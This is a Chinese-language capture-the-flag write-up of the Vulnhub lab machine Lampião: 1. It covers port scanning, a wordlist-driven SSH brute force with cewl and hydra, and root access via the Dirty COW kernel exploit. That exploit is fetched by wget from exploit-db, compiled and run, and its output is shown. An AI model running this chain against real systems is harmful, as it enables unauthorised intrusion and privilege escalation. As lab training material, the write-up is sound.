作者:KarmA@D0g3
记录一下自己的Vulnhub-Lampião: 1 通关过程
你想继续攻击自己的实验室吗?试试这个全新的易受攻击机器!“Lampião1”。
Goal:得到root权限
Difficulty:easy
Lampião1是一个巴西著名的土匪领袖,flag里面有他的肖像。
首先用netdiscover确定靶机ip,再用nmap扫下端口
一开始用下面这条命令是扫不出1898端口的(这也是我一开始卡着不知道怎么往下走的原因)
nmap -A 192.168.88.112
用下面这条才能扫出来
nmap -n -v -Pn -p- -A --reason -oN nmap.txt 192.168.11.131
-n
(不用域名解析);-V
(打印版本信息);-Pn
(不检测主机存活);--reason
(显示端口处于带确认状态的原因);-oN
(将标准输出直接写入指定的文件) ;-p-
(应该是全部端口都扫一遍)
22是ssh端口,那就先按照惯例,看看80端口吧。
就一个字符画,有个fi duma egud?不晓得什么意思~~
既然80端口没有什么收获,那就来1898端口瞧瞧,看到是Drupal,那就先常规思路走一波
网上的都是drupal 7.x 利用PHP filter模块去getshell,但是这里登陆模块似乎用不了?因为注册时激活邮件发不出去,没办法激活,所以这条路看来是走不通了。
这不是一个纯英文的网站,会不会有可能网站里面的英文是密码提示??可不可以做个字典爆破一波?
Cewl了解一下,
默认文章肯定不会有tips,那就弄另一篇生成个字典看看
# cewl -w dict.txt http://192.168.11.131:1898/?q=node/1
仔细观察,发现还有两个作者(username??),试试呗~
# echo tiago > usernames.txt
# echo eder >> usernames.txt
爆破工具hydra了解一下……
-t 速度,-e nsr就是把用户名密码换着来爆破
既然搞到账号密码了,赶紧连进去呗。
一个低权限,那就查查内核什么的,看看怎么提权
tiago@lampiao:~$ uname -a
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
tiago@lampiao:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 14.04.5 LTS
Release: 14.04
Codename: trusty
用一个脚本看看现成的exp有哪些
$ wget -q -O /tmp/linux-exploit-suggester.sh https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
$ chmod +x /tmp/linux-exploit-suggester.sh
$ /tmp/linux-exploit-suggester.sh
...
[+] [CVE-2016-5195] dirtycow 2
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Tags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}
Download URL: https://www.exploit-db.com/download/40839
ext-url: https://www.exploit-db.com/download/40847.cpp
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
dirtycow走你~
$ wget -q -O /tmp/40847.cpp https://www.exploit-db.com/download/40847.cpp
$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
$ ./dcow -s
Running ...
Password overridden to: dirtyCowFun
Received su prompt (Password: )
root@lampiao:~# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@lampiao:~# cp /tmp/.ssh_bak /etc/passwd
root@lampiao:~# rm /tmp/.ssh_bak
root@lampiao:~#
Root权限到手~
root@lampiao:~# cat flag.txt
9740616875908d91ddcdaa8aea3af366
flag里面这一串是什么鬼~
在80端口的根目录发现一个lampiao.jpg
网页上打不开,scp到本地发现下面这幅图
网页上打不开难道是做过手脚?md5不能解密,那就看看这个图是不是flag
root@lampiao:/var/www/html# md5sum lampiao.jpg
9740616875908d91ddcdaa8aea3af366 lampiao.jpg
好吧,还真是~著名的Lampião!